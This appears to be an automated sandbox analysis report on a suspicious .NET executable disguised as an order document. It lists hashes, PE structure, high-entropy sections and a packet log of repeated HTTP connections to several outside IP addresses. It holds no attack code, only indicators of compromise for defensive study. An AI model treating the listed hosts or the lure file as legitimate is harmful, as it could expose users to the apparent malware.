                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    Static File Info

                                                    General

                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Entropy (8bit):7.951448776957406
                                                    TrID:
                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                    • Windows Screen Saver (13104/52) 0.07%
                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                    File name:spec 4008670601 AZTEK Order.exe
                                                    File size:995'840 bytes
                                                    MD5:f07575dcccaa8b88972464b50b63b017
                                                    SHA1:7949418fc5d9d6fd76c1d0349fc8dce96d777e1d
                                                    SHA256:6ce9c6e014f84badeec8435e6e781fbde6946dc45b627aff3a307e4dee1f0934
                                                    SHA512:0f326c5b5cea77152e1bc83c5709d28b67a1ae33f6d65147dc41da20d5f67a021a63177a79db67fa249e63eb16c5cacaf6e84abeaf45cf88ac99db230c60638d
                                                    SSDEEP:24576:0P0ztpDRbm2mYBjMQm60rrpb3S2eDfTs:0qtd82hjo6irB5eE
                                                    TLSH:312522011AA5DB95D93A8FB99537550023F0FC6F25A1CA6E2DC270FF9871F124822FA7
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....M...............0......f........... ........@.. ....................................@................................

                                                    File Icon

                                                    Icon Hash:66666667e69c310e

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x4ee892
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0xDC4DDEC0 [Fri Feb 14 19:53:36 2087 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                    Entrypoint Preview

                                                    Instruction
                                                    jmp dword ptr [00402000h]
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al

                                                    Data Directories

                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xee8400x4f.text
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xf00000x6400.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xf80000xc.reloc
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0xecb200x70.text
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                    Sections

                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x20000xec8980xeca0097b9a7c94109e3c361bd36509306f195False0.9723333085710513data7.978470618395233IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                    .rsrc0xf00000x64000x64005b15a42bc2483c7816556dfdcf80fde7False0.395546875data5.148251263674081IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .reloc0xf80000xc0x2008f5910fcd13b48ec0d373c8cd8d3135eFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                    Resources

                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                    RT_ICON0xf01e00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 00.2701612903225806
                                                    RT_ICON0xf04d80x128Device independent bitmap graphic, 16 x 32 x 4, image size 00.4966216216216216
                                                    RT_ICON0xf06100xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.5439765458422174
                                                    RT_ICON0xf14c80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.6656137184115524
                                                    RT_ICON0xf1d800x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5021676300578035
                                                    RT_ICON0xf22f80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.3157676348547718
                                                    RT_ICON0xf48b00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.4090056285178236
                                                    RT_ICON0xf59680x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.5859929078014184
                                                    RT_GROUP_ICON0xf5de00x76data0.6440677966101694
                                                    RT_VERSION0xf5e680x398OpenPGP Public Key0.4206521739130435
                                                    RT_MANIFEST0xf62100x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                    Imports

                                                    DLLImport
                                                    mscoree.dll_CorExeMain

                                                    Network Behavior

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Jul 3, 2024 17:51:02.596395016 CEST4972480192.168.2.689.31.76.10
                                                    Jul 3, 2024 17:51:02.601322889 CEST804972489.31.76.10192.168.2.6
                                                    Jul 3, 2024 17:51:02.601407051 CEST4972480192.168.2.689.31.76.10
                                                    Jul 3, 2024 17:51:02.603748083 CEST4972480192.168.2.689.31.76.10
                                                    Jul 3, 2024 17:51:02.608607054 CEST804972489.31.76.10192.168.2.6
                                                    Jul 3, 2024 17:51:03.304894924 CEST804972489.31.76.10192.168.2.6
                                                    Jul 3, 2024 17:51:03.304919004 CEST804972489.31.76.10192.168.2.6
                                                    Jul 3, 2024 17:51:03.305151939 CEST4972480192.168.2.689.31.76.10
                                                    Jul 3, 2024 17:51:03.305493116 CEST804972489.31.76.10192.168.2.6
                                                    Jul 3, 2024 17:51:03.305560112 CEST4972480192.168.2.689.31.76.10
                                                    Jul 3, 2024 17:51:03.308245897 CEST4972480192.168.2.689.31.76.10
                                                    Jul 3, 2024 17:51:03.313082933 CEST804972489.31.76.10192.168.2.6
                                                    Jul 3, 2024 17:51:18.615264893 CEST4972680192.168.2.6208.91.197.13
                                                    Jul 3, 2024 17:51:18.620084047 CEST8049726208.91.197.13192.168.2.6
                                                    Jul 3, 2024 17:51:18.620155096 CEST4972680192.168.2.6208.91.197.13
                                                    Jul 3, 2024 17:51:18.622067928 CEST4972680192.168.2.6208.91.197.13
                                                    Jul 3, 2024 17:51:18.626838923 CEST8049726208.91.197.13192.168.2.6
                                                    Jul 3, 2024 17:51:19.066481113 CEST8049726208.91.197.13192.168.2.6
                                                    Jul 3, 2024 17:51:19.066540956 CEST4972680192.168.2.6208.91.197.13
                                                    Jul 3, 2024 17:51:20.135600090 CEST4972680192.168.2.6208.91.197.13
                                                    Jul 3, 2024 17:51:20.140768051 CEST8049726208.91.197.13192.168.2.6
                                                    Jul 3, 2024 17:51:21.154570103 CEST4972880192.168.2.6208.91.197.13
                                                    Jul 3, 2024 17:51:21.159768105 CEST8049728208.91.197.13192.168.2.6
                                                    Jul 3, 2024 17:51:21.159910917 CEST4972880192.168.2.6208.91.197.13
                                                    Jul 3, 2024 17:51:21.161761045 CEST4972880192.168.2.6208.91.197.13
                                                    Jul 3, 2024 17:51:21.167001009 CEST8049728208.91.197.13192.168.2.6
                                                    Jul 3, 2024 17:51:21.612050056 CEST8049728208.91.197.13192.168.2.6
                                                    Jul 3, 2024 17:51:21.612139940 CEST4972880192.168.2.6208.91.197.13
                                                    Jul 3, 2024 17:51:22.666790962 CEST4972880192.168.2.6208.91.197.13
                                                    Jul 3, 2024 17:51:22.671699047 CEST8049728208.91.197.13192.168.2.6
                                                    Jul 3, 2024 17:51:23.685410976 CEST4972980192.168.2.6208.91.197.13
                                                    Jul 3, 2024 17:51:23.690412998 CEST8049729208.91.197.13192.168.2.6
                                                    Jul 3, 2024 17:51:23.690540075 CEST4972980192.168.2.6208.91.197.13
                                                    Jul 3, 2024 17:51:23.692491055 CEST4972980192.168.2.6208.91.197.13
                                                    Jul 3, 2024 17:51:23.697345972 CEST8049729208.91.197.13192.168.2.6
                                                    Jul 3, 2024 17:51:23.697484016 CEST8049729208.91.197.13192.168.2.6
                                                    Jul 3, 2024 17:51:24.146756887 CEST8049729208.91.197.13192.168.2.6
                                                    Jul 3, 2024 17:51:24.146914005 CEST4972980192.168.2.6208.91.197.13
                                                    Jul 3, 2024 17:51:25.198015928 CEST4972980192.168.2.6208.91.197.13
                                                    Jul 3, 2024 17:51:25.203037977 CEST8049729208.91.197.13192.168.2.6
                                                    Jul 3, 2024 17:51:26.216666937 CEST4973080192.168.2.6208.91.197.13
                                                    Jul 3, 2024 17:51:26.221652985 CEST8049730208.91.197.13192.168.2.6
                                                    Jul 3, 2024 17:51:26.221776009 CEST4973080192.168.2.6208.91.197.13
                                                    Jul 3, 2024 17:51:26.223670006 CEST4973080192.168.2.6208.91.197.13
                                                    Jul 3, 2024 17:51:26.228557110 CEST8049730208.91.197.13192.168.2.6
                                                    Jul 3, 2024 17:51:27.306071043 CEST8049730208.91.197.13192.168.2.6
                                                    Jul 3, 2024 17:51:27.306165934 CEST8049730208.91.197.13192.168.2.6
                                                    Jul 3, 2024 17:51:27.306179047 CEST8049730208.91.197.13192.168.2.6
                                                    Jul 3, 2024 17:51:27.306576967 CEST4973080192.168.2.6208.91.197.13
                                                    Jul 3, 2024 17:51:27.306683064 CEST8049730208.91.197.13192.168.2.6
                                                    Jul 3, 2024 17:51:27.306732893 CEST4973080192.168.2.6208.91.197.13
                                                    Jul 3, 2024 17:51:27.306781054 CEST8049730208.91.197.13192.168.2.6
                                                    Jul 3, 2024 17:51:27.308218956 CEST8049730208.91.197.13192.168.2.6
                                                    Jul 3, 2024 17:51:27.308228970 CEST8049730208.91.197.13192.168.2.6
                                                    Jul 3, 2024 17:51:27.308329105 CEST4973080192.168.2.6208.91.197.13
                                                    Jul 3, 2024 17:51:27.310937881 CEST8049730208.91.197.13192.168.2.6
                                                    Jul 3, 2024 17:51:27.311000109 CEST8049730208.91.197.13192.168.2.6
                                                    Jul 3, 2024 17:51:27.311012030 CEST8049730208.91.197.13192.168.2.6
                                                    Jul 3, 2024 17:51:27.311018944 CEST4973080192.168.2.6208.91.197.13
                                                    Jul 3, 2024 17:51:27.311055899 CEST4973080192.168.2.6208.91.197.13
                                                    Jul 3, 2024 17:51:27.311520100 CEST8049730208.91.197.13192.168.2.6
                                                    Jul 3, 2024 17:51:27.312532902 CEST8049730208.91.197.13192.168.2.6
                                                    Jul 3, 2024 17:51:27.312625885 CEST4973080192.168.2.6208.91.197.13
                                                    Jul 3, 2024 17:51:27.313193083 CEST8049730208.91.197.13192.168.2.6
                                                    Jul 3, 2024 17:51:27.313239098 CEST8049730208.91.197.13192.168.2.6
                                                    Jul 3, 2024 17:51:27.313250065 CEST8049730208.91.197.13192.168.2.6
                                                    Jul 3, 2024 17:51:27.313333035 CEST4973080192.168.2.6208.91.197.13
                                                    Jul 3, 2024 17:51:27.354257107 CEST4973080192.168.2.6208.91.197.13
                                                    Jul 3, 2024 17:51:27.393676043 CEST8049730208.91.197.13192.168.2.6
                                                    Jul 3, 2024 17:51:27.393698931 CEST8049730208.91.197.13192.168.2.6
                                                    Jul 3, 2024 17:51:27.393709898 CEST8049730208.91.197.13192.168.2.6
                                                    Jul 3, 2024 17:51:27.393744946 CEST8049730208.91.197.13192.168.2.6
                                                    Jul 3, 2024 17:51:27.393841982 CEST4973080192.168.2.6208.91.197.13
                                                    Jul 3, 2024 17:51:27.393903971 CEST4973080192.168.2.6208.91.197.13
                                                    Jul 3, 2024 17:51:27.395718098 CEST8049730208.91.197.13192.168.2.6
                                                    Jul 3, 2024 17:51:27.395828962 CEST8049730208.91.197.13192.168.2.6
                                                    Jul 3, 2024 17:51:27.395838022 CEST8049730208.91.197.13192.168.2.6
                                                    Jul 3, 2024 17:51:27.395941019 CEST4973080192.168.2.6208.91.197.13
                                                    Jul 3, 2024 17:51:27.395960093 CEST8049730208.91.197.13192.168.2.6
                                                    Jul 3, 2024 17:51:27.395972967 CEST8049730208.91.197.13192.168.2.6
                                                    Jul 3, 2024 17:51:27.395982981 CEST8049730208.91.197.13192.168.2.6
                                                    Jul 3, 2024 17:51:27.396003962 CEST4973080192.168.2.6208.91.197.13
                                                    Jul 3, 2024 17:51:27.396043062 CEST4973080192.168.2.6208.91.197.13
                                                    Jul 3, 2024 17:51:27.396455050 CEST8049730208.91.197.13192.168.2.6
                                                    Jul 3, 2024 17:51:27.396517038 CEST8049730208.91.197.13192.168.2.6
                                                    Jul 3, 2024 17:51:27.396528959 CEST8049730208.91.197.13192.168.2.6
                                                    Jul 3, 2024 17:51:27.396591902 CEST8049730208.91.197.13192.168.2.6
                                                    Jul 3, 2024 17:51:27.396594048 CEST4973080192.168.2.6208.91.197.13
                                                    Jul 3, 2024 17:51:27.396637917 CEST4973080192.168.2.6208.91.197.13
                                                    Jul 3, 2024 17:51:27.397126913 CEST8049730208.91.197.13192.168.2.6
                                                    Jul 3, 2024 17:51:27.397142887 CEST8049730208.91.197.13192.168.2.6
                                                    Jul 3, 2024 17:51:27.397269011 CEST4973080192.168.2.6208.91.197.13
                                                    Jul 3, 2024 17:51:27.398711920 CEST8049730208.91.197.13192.168.2.6
                                                    Jul 3, 2024 17:51:27.398766041 CEST8049730208.91.197.13192.168.2.6
                                                    Jul 3, 2024 17:51:27.398777962 CEST8049730208.91.197.13192.168.2.6
                                                    Jul 3, 2024 17:51:27.398838043 CEST4973080192.168.2.6208.91.197.13
                                                    Jul 3, 2024 17:51:27.398899078 CEST8049730208.91.197.13192.168.2.6
                                                    Jul 3, 2024 17:51:27.398910999 CEST8049730208.91.197.13192.168.2.6
                                                    Jul 3, 2024 17:51:27.398963928 CEST4973080192.168.2.6208.91.197.13
                                                    Jul 3, 2024 17:51:27.399156094 CEST8049730208.91.197.13192.168.2.6
                                                    Jul 3, 2024 17:51:27.399208069 CEST4973080192.168.2.6208.91.197.13
                                                    Jul 3, 2024 17:51:27.399415016 CEST8049730208.91.197.13192.168.2.6
                                                    Jul 3, 2024 17:51:27.399472952 CEST4973080192.168.2.6208.91.197.13
                                                    Jul 3, 2024 17:51:27.404155970 CEST4973080192.168.2.6208.91.197.13
                                                    Jul 3, 2024 17:51:27.409240961 CEST8049730208.91.197.13192.168.2.6
                                                    Jul 3, 2024 17:51:32.447685003 CEST4973280192.168.2.6188.114.96.3
                                                    Jul 3, 2024 17:51:32.452836990 CEST8049732188.114.96.3192.168.2.6
                                                    Jul 3, 2024 17:51:32.453007936 CEST4973280192.168.2.6188.114.96.3
                                                    Jul 3, 2024 17:51:32.454891920 CEST4973280192.168.2.6188.114.96.3
                                                    Jul 3, 2024 17:51:32.459806919 CEST8049732188.114.96.3192.168.2.6
                                                    Jul 3, 2024 17:51:33.242646933 CEST8049732188.114.96.3192.168.2.6
                                                    Jul 3, 2024 17:51:33.242700100 CEST8049732188.114.96.3192.168.2.6
                                                    Jul 3, 2024 17:51:33.242794991 CEST4973280192.168.2.6188.114.96.3
                                                    Jul 3, 2024 17:51:33.245584965 CEST8049732188.114.96.3192.168.2.6
                                                    Jul 3, 2024 17:51:33.245676994 CEST4973280192.168.2.6188.114.96.3
                                                    Jul 3, 2024 17:51:33.970508099 CEST4973280192.168.2.6188.114.96.3
                                                    Jul 3, 2024 17:51:34.982839108 CEST4973380192.168.2.6188.114.96.3
                                                    Jul 3, 2024 17:51:34.987853050 CEST8049733188.114.96.3192.168.2.6
                                                    Jul 3, 2024 17:51:34.988023996 CEST4973380192.168.2.6188.114.96.3
                                                    Jul 3, 2024 17:51:34.995667934 CEST4973380192.168.2.6188.114.96.3
                                                    Jul 3, 2024 17:51:35.000689983 CEST8049733188.114.96.3192.168.2.6
                                                    Jul 3, 2024 17:51:35.760761976 CEST8049733188.114.96.3192.168.2.6
                                                    Jul 3, 2024 17:51:35.760785103 CEST8049733188.114.96.3192.168.2.6
                                                    Jul 3, 2024 17:51:35.760854006 CEST4973380192.168.2.6188.114.96.3
                                                    Jul 3, 2024 17:51:35.761648893 CEST8049733188.114.96.3192.168.2.6
                                                    Jul 3, 2024 17:51:35.761697054 CEST4973380192.168.2.6188.114.96.3
                                                    Jul 3, 2024 17:51:36.511003971 CEST4973380192.168.2.6188.114.96.3
                                                    Jul 3, 2024 17:51:37.530044079 CEST4973480192.168.2.6188.114.96.3
                                                    Jul 3, 2024 17:51:37.832607031 CEST8049734188.114.96.3192.168.2.6
                                                    Jul 3, 2024 17:51:37.832748890 CEST4973480192.168.2.6188.114.96.3
                                                    Jul 3, 2024 17:51:37.834734917 CEST4973480192.168.2.6188.114.96.3
                                                    Jul 3, 2024 17:51:37.844156981 CEST8049734188.114.96.3192.168.2.6
                                                    Jul 3, 2024 17:51:37.848347902 CEST8049734188.114.96.3192.168.2.6
                                                    Jul 3, 2024 17:51:38.469121933 CEST8049734188.114.96.3192.168.2.6
                                                    Jul 3, 2024 17:51:38.469666958 CEST8049734188.114.96.3192.168.2.6
                                                    Jul 3, 2024 17:51:38.469679117 CEST8049734188.114.96.3192.168.2.6
                                                    Jul 3, 2024 17:51:38.469691038 CEST8049734188.114.96.3192.168.2.6
                                                    Jul 3, 2024 17:51:38.469736099 CEST4973480192.168.2.6188.114.96.3
                                                    Jul 3, 2024 17:51:38.469774008 CEST4973480192.168.2.6188.114.96.3
                                                    Jul 3, 2024 17:51:39.338663101 CEST4973480192.168.2.6188.114.96.3
                                                    Jul 3, 2024 17:51:40.357212067 CEST4973580192.168.2.6188.114.96.3
                                                    Jul 3, 2024 17:51:40.362020969 CEST8049735188.114.96.3192.168.2.6
                                                    Jul 3, 2024 17:51:40.362164021 CEST4973580192.168.2.6188.114.96.3
                                                    Jul 3, 2024 17:51:40.364011049 CEST4973580192.168.2.6188.114.96.3
                                                    Jul 3, 2024 17:51:40.369360924 CEST8049735188.114.96.3192.168.2.6
                                                    Jul 3, 2024 17:51:41.055814981 CEST8049735188.114.96.3192.168.2.6
                                                    Jul 3, 2024 17:51:41.055840969 CEST8049735188.114.96.3192.168.2.6
                                                    Jul 3, 2024 17:51:41.055995941 CEST4973580192.168.2.6188.114.96.3
                                                    Jul 3, 2024 17:51:41.066834927 CEST4973580192.168.2.6188.114.96.3
                                                    Jul 3, 2024 17:51:41.071897984 CEST8049735188.114.96.3192.168.2.6
                                                    Jul 3, 2024 17:51:46.551346064 CEST4973780192.168.2.6192.185.208.8
                                                    Jul 3, 2024 17:51:46.556284904 CEST8049737192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:46.556372881 CEST4973780192.168.2.6192.185.208.8
                                                    Jul 3, 2024 17:51:46.558480024 CEST4973780192.168.2.6192.185.208.8
                                                    Jul 3, 2024 17:51:46.563303947 CEST8049737192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:47.246383905 CEST8049737192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:47.246406078 CEST8049737192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:47.246417999 CEST8049737192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:47.246437073 CEST8049737192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:47.246514082 CEST4973780192.168.2.6192.185.208.8
                                                    Jul 3, 2024 17:51:47.246598959 CEST4973780192.168.2.6192.185.208.8
                                                    Jul 3, 2024 17:51:47.247538090 CEST8049737192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:47.247553110 CEST8049737192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:47.247565031 CEST8049737192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:47.247581005 CEST8049737192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:47.247586012 CEST4973780192.168.2.6192.185.208.8
                                                    Jul 3, 2024 17:51:47.247595072 CEST8049737192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:47.247607946 CEST8049737192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:47.247627020 CEST8049737192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:47.247632027 CEST4973780192.168.2.6192.185.208.8
                                                    Jul 3, 2024 17:51:47.247668028 CEST4973780192.168.2.6192.185.208.8
                                                    Jul 3, 2024 17:51:47.256139994 CEST8049737192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:47.256210089 CEST4973780192.168.2.6192.185.208.8
                                                    Jul 3, 2024 17:51:47.297018051 CEST8049737192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:47.297422886 CEST8049737192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:47.297437906 CEST8049737192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:47.297486067 CEST4973780192.168.2.6192.185.208.8
                                                    Jul 3, 2024 17:51:47.297543049 CEST4973780192.168.2.6192.185.208.8
                                                    Jul 3, 2024 17:51:48.118865967 CEST4973780192.168.2.6192.185.208.8
                                                    Jul 3, 2024 17:51:49.123428106 CEST4973880192.168.2.6192.185.208.8
                                                    Jul 3, 2024 17:51:49.128643990 CEST8049738192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:49.130213976 CEST4973880192.168.2.6192.185.208.8
                                                    Jul 3, 2024 17:51:49.132194042 CEST4973880192.168.2.6192.185.208.8
                                                    Jul 3, 2024 17:51:49.137547970 CEST8049738192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:49.767226934 CEST8049738192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:49.767318964 CEST8049738192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:49.767355919 CEST8049738192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:49.767410994 CEST8049738192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:49.767411947 CEST4973880192.168.2.6192.185.208.8
                                                    Jul 3, 2024 17:51:49.767462015 CEST8049738192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:49.767498016 CEST8049738192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:49.767502069 CEST4973880192.168.2.6192.185.208.8
                                                    Jul 3, 2024 17:51:49.767532110 CEST8049738192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:49.767551899 CEST4973880192.168.2.6192.185.208.8
                                                    Jul 3, 2024 17:51:49.767592907 CEST8049738192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:49.767683029 CEST8049738192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:49.767709017 CEST4973880192.168.2.6192.185.208.8
                                                    Jul 3, 2024 17:51:49.767720938 CEST8049738192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:49.767777920 CEST4973880192.168.2.6192.185.208.8
                                                    Jul 3, 2024 17:51:49.772943974 CEST8049738192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:49.773170948 CEST8049738192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:49.773232937 CEST4973880192.168.2.6192.185.208.8
                                                    Jul 3, 2024 17:51:49.855851889 CEST8049738192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:49.856034994 CEST8049738192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:49.856046915 CEST8049738192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:49.856110096 CEST4973880192.168.2.6192.185.208.8
                                                    Jul 3, 2024 17:51:50.635503054 CEST4973880192.168.2.6192.185.208.8
                                                    Jul 3, 2024 17:51:51.654239893 CEST4973980192.168.2.6192.185.208.8
                                                    Jul 3, 2024 17:51:51.659070015 CEST8049739192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:51.659243107 CEST4973980192.168.2.6192.185.208.8
                                                    Jul 3, 2024 17:51:51.661206961 CEST4973980192.168.2.6192.185.208.8
                                                    Jul 3, 2024 17:51:51.666071892 CEST8049739192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:51.666187048 CEST8049739192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:52.284810066 CEST8049739192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:52.284831047 CEST8049739192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:52.284842968 CEST8049739192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:52.285006046 CEST4973980192.168.2.6192.185.208.8
                                                    Jul 3, 2024 17:51:52.285145998 CEST8049739192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:52.285200119 CEST8049739192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:52.285211086 CEST8049739192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:52.285223007 CEST4973980192.168.2.6192.185.208.8
                                                    Jul 3, 2024 17:51:52.285247087 CEST4973980192.168.2.6192.185.208.8
                                                    Jul 3, 2024 17:51:52.285393953 CEST8049739192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:52.285404921 CEST8049739192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:52.285415888 CEST8049739192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:52.285427094 CEST8049739192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:52.285439968 CEST4973980192.168.2.6192.185.208.8
